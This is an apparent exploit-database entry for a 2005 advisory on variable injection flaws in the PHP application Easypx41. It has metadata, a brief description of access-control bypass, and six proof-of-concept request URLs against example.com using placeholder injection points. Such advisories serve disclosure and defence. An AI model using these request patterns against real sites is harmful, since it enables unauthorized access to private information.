Easypx41 - Multiple Variable Injection Vulnerabilities

Author: FalconDeOro
type: webapps
platform: php
port: 
date_added: 2005-07-29 
date_updated: 2013-06-09 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/14421/info

Easypx41 is prone to multiple variable injection vulnerabilities.

An attacker can manipulate multiple script input variables and bypass access controls to retrieve sensitive and privileged information. Information obtained may aid in further attacks against the vulnerable application or the underlying system.

http://www.example.com/index.php?pg=&L=[variable-injection]&H=[variable-injection]
http://www.example.com/index.php?pg=modules/forum/viewtopic.php&Forum=Forum%20de%20d?monstration.&msg=1103495330.dat&pgfull[variable-injection]
http://www.example.com/index.php?pg=http://google.fr&pgtype=iframe&L=500&H=500
http://www.example.com/index.php?pg=modules/forum/viewprofil.php&membres=[variable-injection]&pgfull[variable-injection]
http://www.example.com/index.php?pg=modules/forum/viewprofil.php&membres=[variable-injection]
http://www.example.com/index.php?pg=modules/forum/viewtopic.php&Forum=[change-or-variable-injection].&msg=1103495330.dat&pgfull